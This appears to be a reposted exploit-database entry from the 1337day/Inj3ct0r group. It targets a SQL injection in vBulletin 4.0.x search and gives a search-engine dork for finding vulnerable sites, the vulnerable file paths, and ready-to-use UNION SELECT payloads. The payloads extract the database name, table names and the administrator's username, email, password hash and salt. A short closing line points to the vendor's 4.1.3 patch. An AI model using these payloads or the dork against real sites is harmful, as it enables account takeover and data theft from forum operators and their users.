[cc lang=”php”]1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /’ __ /’__` / __ /’__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /’ _ ` / /_/__<_ /'___ / /`'__ 0 0 / / / / __/ _ _ / 1 1 _ _ __ ____/ ____\ __\ ____/ _ 0 0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1 1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#PhilKer – PinoyHack – RootCON – GreyHat Hackers – Security Analyst#
#[+] Discovered By : D4rkB1t
#[+] Site : 1337day.com Inj3ct0r Team
#[+] support e-mail : d4rkb1t@live.com
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:”search.php?search_type=1″

————————–
# ~Vulnerable Codes~ #
————————–
/vb/search/searchtools.php – line 715;
/packages/vbforum/search/type/socialgroup.php – line 201:203;

————————–
# ~Exploit~ #
————————–
POST data on “Search Multiple Content Types” => “groups”

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

————————–
# ~Advice~ #
————————–
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger…
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc

———————

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936

====================================================================
# #
# 888 d8 888 _ 888 ,d d8 #
# e88~888 d88 888-~ 888 e~ ~ 888-~88e ,d888 _d88__ #
# d888 888 d888 888 888d8b 888 888b 888 888 #
# 8888 888 / 888 888 888Y88b 888 8888 888 888 #
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
# “88_/888 888 888 888 Y88b 888-_88” 888 “88_/ #
# #
====================================================================
[/cc]

source